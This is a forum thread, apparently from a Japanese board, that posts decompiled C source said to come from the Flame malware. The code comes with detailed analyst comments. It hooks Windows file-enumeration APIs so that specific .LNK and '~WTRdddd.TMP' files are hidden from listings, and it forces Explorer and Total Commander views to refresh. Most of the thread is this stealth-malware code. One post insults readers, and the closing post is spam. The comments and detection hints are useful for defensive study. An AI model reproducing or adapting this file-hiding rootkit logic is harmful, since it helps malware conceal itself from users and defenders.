
Flame Virus Source code

1sasami_327:2013/06/29(土) 19:25:32
//----- (10001230) --------------------------------------------------------
// Decides whether one directory entry is to be suppressed from a Find*File
// result. Called from the FindFirstFileW / FindFirstFileExW replacements with
// a1 = byte length of the name (2 * lstrlenW), a2 = pointer to the wide name,
// a3 = nFileSizeLow, a4 = nFileSizeHigh (the callers read +28/+32/+44, which
// match the WIN32_FIND_DATAW layout: nFileSizeHigh, nFileSizeLow, cFileName).
// Returns non-zero when the entry is to be hidden, i.e. when either
//   - the name is longer than 4 chars and ends in ".LNK" (ASCII case-folded)
//     and the file size is exactly 4171 bytes (or both size words are -1), or
//   - sub_100012A0 recognises the "~WTRdddd.TMP" rule.
// An odd byte length (not a whole number of WCHARs) yields 0.
char __userpurge sub_10001230<al>(signed int a1<eax>, int a2<ecx>, unsigned int a3, int a4)
{
int v4; // edi@1
char result; // al@2
signed int v6; // esi@3

v4 = a2;
if ( a1 & 1 )
{
// not a whole number of 2-byte characters
result = 0;
}
else
{
v6 = a1 / 2; // character count
// The condition below is the negation of
//   size == 4171 (or -1) && count > 4 && tail == ".LNK".
// When that .LNK case holds the entry is hidden outright (result = 1);
// every other entry is deferred to the ~WTR*.TMP check.
if ( (a4 & a3) != -1 && (a4 || a3 != 4171) || v6 <= 4 || !sub_10001340(4, a2 + 2 * v6 - 8, (int)L".LNK") )
result = sub_100012A0(v4, v6, a3, a4) != 0;
else
result = 1;
}
return result;
}
// 10005384: using guessed type wchar_t a_lnk[5];

2sasami_327:2013/06/29(土) 19:26:08
//----- (100012A0) --------------------------------------------------------
// Second hidden-file rule: a 12-character name of the form "~WTRdddd.TMP"
// (prefix and extension compared ASCII case-insensitively) whose four digits
// sum to a multiple of 10, with a file size between 0x1000 and 0x800000 bytes
// and a zero high dword (or both size words equal to -1).
// a1 = pointer to the wide name, a2 = character count,
// a3 = nFileSizeLow, a4 = nFileSizeHigh.
// Returns 1 when the rule matches (the caller hides the entry), otherwise 0.
// Detection: a clean enumeration (one not routed through the hooked process)
// can be searched for this name shape and size window.
char __userpurge sub_100012A0<al>(int a1<edi>, int a2, unsigned int a3, int a4)
{
int v4; // esi@1
signed int v6; // ecx@9
unsigned __int16 v7; // ax@10

v4 = 0;
// size window 4 KiB .. 8 MiB (or -1), exactly 12 chars,
// chars 8..11 == ".TMP" (a1 + 16 bytes), chars 0..3 == "~WTR"
if ( ((a4 & a3) == -1 || !a4 && a3 >= 0x1000 && a3 <= 0x800000)
&& a2 == 12
&& sub_10001340(4, a1 + 16, (int)L".TMP")
&& sub_10001340(12, a1, (int)L"~WTR") )
{
v6 = 4;
while ( 1 )
{
v7 = *(_WORD *)(a1 + 2 * v6);
// chars 4..7 must all be ASCII digits '0'..'9'
if ( v7 < 0x30u )
break;
if ( v7 > 0x39u )
break;
++v6;
v4 = (v7 + v4 - 48) % 10; // running digit sum, modulo 10
if ( v6 > 7 )
return v4 == 0; // all four digits seen: match only if the sum is divisible by 10
}
}
return 0;
}
// 10005390: using guessed type wchar_t a_tmp[5];
// 1000539C: using guessed type wchar_t aWtr[5];

3sasami_327:2013/06/29(土) 19:26:47
//----- (10001340) --------------------------------------------------------
// Bounded, ASCII case-insensitive wide-string prefix compare used by the
// filename rules. a1 = maximum number of characters to examine, a2 = pointer
// to the candidate wide string, a3 = pointer to the NUL-terminated wide
// pattern. Only 'a'..'z' is folded (subtracting 32); every other code unit
// compares as-is. Returns 1 when the pattern's terminator is reached with all
// characters equal (an empty pattern matches trivially), 0 when a character
// differs or a1 characters are consumed before the pattern ends.
// NOTE(review): the candidate string is never checked for its own terminator;
// callers bound it through a1.
char __usercall sub_10001340<al>(int a1<eax>, int a2<edx>, int a3<ecx>)
{
unsigned __int16 v3; // ax@1
int v4; // edi@1
int v5; // esi@1
int v6; // edx@3
int v7; // eax@5
char result; // al@9

v4 = a1;
v3 = *(_WORD *)a3;
v5 = a2;
if ( *(_WORD *)a3 )
{
while ( v4 )
{
v6 = v3;
if ( (unsigned int)v3 - 97 <= 0x19 ) // pattern char in 'a'..'z'
v6 = v3 - 32; // fold to upper case
v7 = *(_WORD *)v5;
if ( (unsigned int)(v7 - 97) <= 0x19 ) // candidate char in 'a'..'z'
v7 -= 32;
if ( v6 != v7 )
break;
v3 = *(_WORD *)(a3 + 2);
a3 += 2;
v5 += 2;
--v4;
if ( !v3 )
goto LABEL_9; // pattern exhausted with no mismatch
}
// mismatch, or a1 characters consumed before the pattern ended
result = 0;
}
else
{
LABEL_9:
result = 1;
}
return result;
}

4sasami_327:2013/06/29(土) 19:27:46
//----- (10001390) --------------------------------------------------------
// Maps an NtQueryDirectoryFile information class (a4) to the byte offsets the
// directory-buffer filter needs inside each entry:
//   *a1 = offset of FileNameLength, *a2 = offset of EndOfFile
//   (-1 when the class carries no size), *a3 = offset of FileName.
// The numbers agree with the FILE_*_INFORMATION layouts for
//   1  FileDirectoryInformation        2  FileFullDirectoryInformation
//   3  FileBothDirectoryInformation    12 FileNamesInformation
//   37 FileIdBothDirectoryInformation  38 FileIdFullDirectoryInformation
// Returns 1 for a supported class, 0 otherwise; the caller (sub_100014C0)
// leaves the buffer untouched for unsupported classes.
char __usercall sub_10001390<al>(int a1<eax>, int a2<edx>, int a3<ecx>, int a4<esi>)
{
char result; // al@2

switch ( a4 )
{
case 3:
*(_DWORD *)a1 = 60;
*(_DWORD *)a2 = 40;
*(_DWORD *)a3 = 94;
result = 1;
break;
case 1:
*(_DWORD *)a1 = 60;
*(_DWORD *)a2 = 40;
*(_DWORD *)a3 = 64;
result = 1;
break;
case 2:
*(_DWORD *)a1 = 60;
*(_DWORD *)a2 = 40;
*(_DWORD *)a3 = 68;
result = 1;
break;
case 37:
*(_DWORD *)a1 = 60;
*(_DWORD *)a2 = 40;
*(_DWORD *)a3 = 104;
result = 1;
break;
case 38:
*(_DWORD *)a1 = 60;
*(_DWORD *)a2 = 40;
*(_DWORD *)a3 = 80;
result = 1;
break;
case 12:
// FileNamesInformation has no EndOfFile field, hence -1
*(_DWORD *)a1 = 8;
*(_DWORD *)a2 = -1;
*(_DWORD *)a3 = 12;
result = 1;
break;
default:
result = 0;
break;
}
return result;
}

5sasami_327:2013/06/29(土) 19:28:16

//----- (10001430) --------------------------------------------------------
// Installs the directory-enumeration hooks. sub_100019A0 is not shown; it is
// called as (export name, module name, replacement routine, &saved original),
// and the "saved original" globals are what the replacements later invoke
// (e.g. dword_10006178 in sub_100014C0), so it presumably redirects the named
// export to the replacement while preserving the original entry point.
// Covered: KERNEL32 FindFirstFileW, FindNextFileW, FindFirstFileExW and NTDLL
// NtQueryDirectoryFile / ZwQueryDirectoryFile (both routed to sub_100014C0).
// Afterwards sub_10001790 makes the host's file views redraw so entries that
// are now filtered disappear from display.
// Detection: user-mode patches on exactly these five exports are the
// observable artefact of this component.
BOOL __cdecl sub_10001430()
{
sub_100019A0("FindFirstFileW", (DWORD)"KERNEL32.DLL", (int)sub_10001580, (int)&dword_1000617C);
sub_100019A0("FindNextFileW", (DWORD)"KERNEL32.DLL", (int)sub_10001600, (int)&dword_10006180);
sub_100019A0("FindFirstFileExW", (DWORD)"KERNEL32.DLL", (int)sub_10001700, (int)&dword_10006184);
sub_100019A0("NtQueryDirectoryFile", (DWORD)"NTDLL.DLL", (int)sub_100014C0, (int)&dword_10006178);
sub_100019A0("ZwQueryDirectoryFile", (DWORD)"NTDLL.DLL", (int)sub_100014C0, (int)&dword_10006178);
return sub_10001790();
}
// 10006178: using guessed type int (__stdcall *dword_10006178)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD);
// 1000617C: using guessed type int (__stdcall *dword_1000617C)(_DWORD, _DWORD);
// 10006180: using guessed type int (__stdcall *dword_10006180)(_DWORD, _DWORD);
// 10006184: using guessed type int (__stdcall *dword_10006184)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD);

6sasami_327:2013/06/29(土) 19:28:51

//----- (100014C0) --------------------------------------------------------
// Replacement for NtQueryDirectoryFile / ZwQueryDirectoryFile. The eleven
// parameters follow the native prototype: a6 = FileInformation buffer,
// a7 = Length, a8 = FileInformationClass, a11 = RestartScan.
// Calls the saved original (dword_10006178). While it succeeds (0) with a
// non-NULL buffer, sub_10001390 supplies the per-class entry offsets and the
// buffer is handed to sub_10001090 (not shown; presumably removes the entries
// matching the hidden-file rules in place). An unsupported class, or a
// non-zero return from sub_10001090, ends the call with STATUS_SUCCESS (0) and
// whatever the buffer now holds. A zero return — presumably "every entry was
// removed" — triggers a re-query with RestartScan = FALSE to fetch the next
// batch, at most 10 times; then 0xC000000F (STATUS_NO_SUCH_FILE) is returned.
// If no original was saved, returns 0xC0000017 (STATUS_NO_MEMORY).
int __stdcall sub_100014C0(int a1, int a2, int a3, int a4, int a5, unsigned int a6, int a7, int a8, int a9, int a10, int a11)
{
int result; // eax@2
unsigned __int8 v12; // sf@8
unsigned __int8 v13; // of@8
int v14; // [sp+2Ch] [bp-10h]@3
int v15; // [sp+30h] [bp-Ch]@6
int v16; // [sp+34h] [bp-8h]@6
int v17; // [sp+38h] [bp-4h]@6

if ( dword_10006178 )
{
v14 = 0; // number of fully-filtered batches re-queried so far
while ( 1 )
{
result = dword_10006178(a1, a2, a3, a4, a5, a6, a7, a8, a9, a10, a11);
if ( result )
break; // pass native failures through unchanged
if ( !a6 )
break;
// v15 = FileNameLength offset, v17 = EndOfFile offset, v16 = FileName offset
if ( !sub_10001390((int)&v15, (int)&v17, (int)&v16, a8) || sub_10001090(a7, a6, v17, v16, v15) )
return 0;
LOBYTE(a11) = 0; // RestartScan = FALSE for the follow-up query
// Decompiler rendering of: if ( ++v14 >= 10 ) return STATUS_NO_SUCH_FILE;
v13 = __SETO__(v14 + 1, 10);
v12 = v14++ - 9 < 0;
if ( !(v12 ^ v13) )
return -1073741809;
}
}
else
{
result = -1073741801;
}
return result;
}
// 10006178: using guessed type int (__stdcall *dword_10006178)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD);

7sasami_327:2013/06/29(土) 19:29:21

//----- (10001580) --------------------------------------------------------
// Replacement for FindFirstFileW (a1 = lpFileName, a2 = lpFindFileData).
// Calls the saved original (dword_1000617C); a failure (INVALID_HANDLE_VALUE,
// -1) or a missing original is passed through as -1. Otherwise the first
// entry's size words (+28 nFileSizeHigh, +32 nFileSizeLow) and name
// (+44 cFileName) are checked by sub_10001230; if the entry is to be hidden,
// the FindNextFileW replacement (sub_10001600) advances the handle to the
// next visible entry, which it writes over *a2. If none remains the handle is
// closed and the call is made to look like a miss: SetLastError(2)
// (ERROR_FILE_NOT_FOUND) and return -1.
signed int __stdcall sub_10001580(int a1, int a2)
{
int v2; // ebx@2
int v3; // ST08_4@3
unsigned int v4; // ST04_4@3
int v5; // eax@3

if ( !dword_1000617C || (v2 = dword_1000617C(a1, a2), v2 == -1) )
return -1;
v3 = *(_DWORD *)(a2 + 28); // nFileSizeHigh
v4 = *(_DWORD *)(a2 + 32); // nFileSizeLow
v5 = lstrlenW((LPCWSTR)(a2 + 44)); // cFileName length in chars
if ( sub_10001230(2 * v5, a2 + 44, v4, v3) && !sub_10001600(v2, a2) )
{
// first entry hidden and nothing visible follows: report "not found"
SetLastError(2u);
CloseHandle((HANDLE)v2);
return -1;
}
return v2;
}
// 1000617C: using guessed type int (__stdcall *dword_1000617C)(_DWORD, _DWORD);

8sasami_327:2013/06/29(土) 19:30:21

//----- (10001600) --------------------------------------------------------
// Replacement for FindNextFileW (a1 = hFindFile, a2 = lpFindFileData).
// Repeatedly calls the saved original (dword_10006180) and skips each entry
// that matches a hidden-file rule: the ".LNK" / 4171-byte rule (an inlined
// copy of sub_10001230 + sub_10001340, comparing the last four characters
// ASCII case-insensitively against L".LNK") and the "~WTRdddd.TMP" rule
// (sub_100012A0). Returns 1 as soon as a non-hidden entry is left in *a2,
// 0 when the original reports no more entries or no original was saved.
signed int __stdcall sub_10001600(int a1, int a2)
{
int v3; // esi@3
signed int v4; // eax@5
signed int v5; // edi@6
signed int v6; // eax@10
int v7; // ecx@10
int v8; // esi@12
int v9; // edx@14
char v10; // zf@16
int v11; // [sp+Ch] [bp-Ch]@10
unsigned int v12; // [sp+10h] [bp-8h]@5
int v13; // [sp+14h] [bp-4h]@5

if ( dword_10006180 )
{
v3 = a2;
LABEL_4:
while ( dword_10006180(a1, v3) )
{
v12 = *(_DWORD *)(v3 + 32); // nFileSizeLow
v13 = *(_DWORD *)(v3 + 28); // nFileSizeHigh
v4 = 2 * lstrlenW((LPCWSTR)(v3 + 44)); // byte length of cFileName
if ( !(v4 & 1) ) // always true here (v4 is even); artefact of inlining sub_10001230
{
v5 = v4 / 2; // character count
// size == 4171 (or -1) and more than 4 characters: test the ".LNK" tail
if ( ((v13 & v12) == -1 || !v13 && v12 == 4171) && v5 > 4 )
{
v7 = (int)L".LNK";
v6 = 4;
v11 = v3 + 44 + 2 * v5 - 8 - (_DWORD)L".LNK"; // v11 + v7 walks the name's last 4 chars while v7 walks L".LNK"
while ( v6 )
{
v8 = *(_WORD *)v7;
if ( (unsigned int)(v8 - 97) <= 0x19 ) // 'a'..'z' -> upper
v8 -= 32;
v9 = *(_WORD *)(v11 + v7);
if ( (unsigned int)(v9 - 97) <= 0x19 )
v9 -= 32;
v10 = v8 == v9;
v3 = a2; // register reuse: restore the buffer pointer
if ( !v10 )
break;
v7 += 2;
--v6;
if ( !*(_WORD *)v7 )
goto LABEL_4; // tail is ".LNK": hide this entry, fetch the next
}
}
if ( sub_100012A0(v3 + 44, v5, v12, v13) )
continue; // "~WTRdddd.TMP" rule: hide this entry too
}
return 1; // entry left in *a2 is visible
}
}
return 0;
}
// 10005384: using guessed type wchar_t a_lnk[5];
// 10006180: using guessed type int (__stdcall *dword_10006180)(_DWORD, _DWORD);

9sasami_327:2013/06/29(土) 19:31:20
こんぐらいのプログラムを組めるようになってから、ハッカーを名乗れよ屑

10sasami_327:2013/06/29(土) 19:32:20

//----- (10001700) --------------------------------------------------------
// Replacement for FindFirstFileExW (a1 = lpFileName, a2 = fInfoLevelId,
// a3 = lpFindFileData, a4 = fSearchOp, a5 = lpSearchFilter,
// a6 = dwAdditionalFlags). Same logic as sub_10001580, except that filtering
// is applied only when fInfoLevelId == 0 (FindExInfoStandard): any other
// level returns the original result untouched (`if ( a2 ) return result;`),
// so an enumeration using FindExInfoBasic (1) is not subject to the hiding.
// Worth knowing when auditing a suspected host with a tool that uses the Ex
// variant.
int __stdcall sub_10001700(int a1, int a2, int a3, int a4, int a5, int a6)
{
int result; // eax@2
int v7; // edi@2
int v8; // ST14_4@4
unsigned int v9; // ST10_4@4
int v10; // eax@4

if ( !dword_10006184 || (result = dword_10006184(a1, a2, a3, a4, a5, a6), v7 = result, result == -1) )
return -1;
if ( a2 )
return result; // non-standard info level: no filtering
v8 = *(_DWORD *)(a3 + 28); // nFileSizeHigh
v9 = *(_DWORD *)(a3 + 32); // nFileSizeLow
v10 = lstrlenW((LPCWSTR)(a3 + 44)); // cFileName length in chars
if ( sub_10001230(2 * v10, a3 + 44, v9, v8) && !sub_10001600(v7, a3) )
{
// first entry hidden and nothing visible follows: report "not found"
SetLastError(2u);
CloseHandle((HANDLE)v7);
return -1;
}
return v7;
}
// 10006184: using guessed type int (__stdcall *dword_10006184)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD);

11sasami_327:2013/06/29(土) 19:34:20

//----- (10001790) --------------------------------------------------------
// UI-refresh step, called by sub_10001430 once the hooks are in place.
// Zero-fills a 0x208-byte (260 WCHAR) buffer — sub_10002D70 is not shown and
// is presumably a memset-style (dst, value, size) routine — reads this
// process's module base name, and sets the EnumWindows lParam to 1 when the
// host is Total Commander ("totalcmd.exe" / "wincmd.exe"), 0 otherwise.
// EnumWindows(EnumFunc, flag) then visits every top-level window; EnumFunc
// hands those owned by this process to sub_10001850, which forces the file
// views to re-read their directories through the hooked APIs.
BOOL __cdecl sub_10001790()
{
LPARAM v0; // esi@1
HANDLE v1; // eax@1
WCHAR String1; // [sp+8h] [bp-208h]@1
char v4; // [sp+Ah] [bp-206h]@1

String1 = 0;
sub_10002D70(&v4, 0, 0x206u); // clear the rest of the 260-WCHAR name buffer
v0 = 0;
v1 = GetCurrentProcess();
GetModuleBaseNameW(v1, 0, &String1, 0x104u);
if ( !lstrcmpiW(&String1, L"totalcmd.exe") || !lstrcmpiW(&String1, L"wincmd.exe") )
v0 = 1; // host is Total Commander: use the activation-message path in sub_10001850
return EnumWindows((WNDENUMPROC)EnumFunc, v0);
}

12sasami_327:2013/06/29(土) 19:36:31

//----- (10001810) --------------------------------------------------------
// EnumWindows callback from sub_10001790. a2 is the "host is Total Commander"
// flag. Windows belonging to the current process are handed to sub_10001850;
// all others are ignored. Always returns 1 so enumeration continues.
signed int __stdcall EnumFunc(HWND hWnd, int a2)
{
DWORD dwProcessId; // [sp+0h] [bp-4h]@1

dwProcessId = 0;
GetWindowThreadProcessId(hWnd, &dwProcessId);
if ( dwProcessId == GetCurrentProcessId() )
sub_10001850((__int32)hWnd, a2);
return 1;
}

13sasami_327:2013/06/29(土) 19:37:35
//----- (10001850) --------------------------------------------------------
// Per-window handler invoked by EnumFunc. `result` carries the HWND in on
// eax; a2 is the "host is Total Commander" flag from sub_10001790.
// Only visible windows are acted on. In Total Commander mode the window
// receives WM_ACTIVATEAPP (0x1C) with wParam 0 then 1 and WM_ACTIVATE (6) with
// WA_CLICKACTIVE (2), which presumably makes the file manager re-read its
// panels. Otherwise, unless the class is "Progman" (the desktop shell
// window), sub_10001910 is applied to the window and, through
// EnumChildWindows with sub_100018F0, to each of its children.
// Returns whatever the last call left in eax; EnumFunc discards it.
__int32 __userpurge sub_10001850<eax>(__int32 result<eax>, int a2)
{
LPARAM v2; // esi@1
DWORD v3; // eax@6
DWORD v4; // eax@6
WCHAR String1; // [sp+4h] [bp-208h]@4

v2 = result; // keep the HWND; eax is reused for return values below
if ( result )
{
result = IsWindowVisible((HWND)result);
if ( result )
{
if ( a2 )
{
// Total Commander path: deactivate / reactivate the application window
v3 = GetCurrentThreadId();
SendMessageW((HWND)v2, 28u, 0, v3); // WM_ACTIVATEAPP, wParam 0
v4 = GetCurrentThreadId();
SendMessageW((HWND)v2, 0x1Cu, 1u, v4); // WM_ACTIVATEAPP, wParam 1
result = SendMessageW((HWND)v2, 6u, 2u, v2); // WM_ACTIVATE, WA_CLICKACTIVE
}
else
{
GetClassNameW((HWND)v2, &String1, 260);
result = lstrcmpiW(&String1, L"Progman");
if ( result ) // skip the desktop shell window
{
sub_10001910((HWND)v2);
result = EnumChildWindows((HWND)v2, (WNDENUMPROC)sub_100018F0, 0);
}
}
}
}
return result;
}

14sasami_327:2013/06/29(土) 19:38:11

//----- (100018F0) --------------------------------------------------------
// EnumChildWindows callback used by sub_10001850: applies sub_10001910 to
// each child window. a2 (lParam) is unused. Always returns 1 to continue.
signed int __stdcall sub_100018F0(HWND a1, int a2)
{
sub_10001910(a1);
return 1;
}

//----- (10001910) --------------------------------------------------------
// Posts an F5 keystroke to a visible Explorer-style file view so that it
// re-reads its directory through the hooked enumeration APIs. The window
// class is compared against "SysListView32" and "DirectUIHWND"; on a match
// WM_KEYDOWN (0x100) and WM_KEYUP (0x101) are posted with VK_F5 (0x74).
// sub_10002D70 is not shown and is presumably a memset-style routine that
// clears the 0x208-byte class-name buffer. The return value is whatever the
// last call left in eax and is ignored by both callers.
void *__usercall sub_10001910<eax>(HWND a1<esi>)
{
void *result; // eax@1
WCHAR String1; // [sp+0h] [bp-208h]@1
char v3; // [sp+2h] [bp-206h]@1

String1 = 0;
result = sub_10002D70(&v3, 0, 0x206u); // clear the rest of the 260-WCHAR buffer
if ( a1 )
{
result = (void *)IsWindowVisible(a1);
if ( result )
{
GetClassNameW(a1, &String1, 260);
if ( !lstrcmpiW(&String1, L"SysListView32") || (result = (void *)lstrcmpiW(&String1, L"DirectUIHWND"), !result) )
{
// F5 key down / key up -> the view refreshes its listing
PostMessageW(a1, 256u, 116u, 0);
result = (void *)PostMessageW(a1, 0x101u, 0x74u, 0);
}
}
}
return result;
}

15check this out:2013/12/20(金) 13:16:18
nZ86Rr I really liked your article.Really thank you! Great.

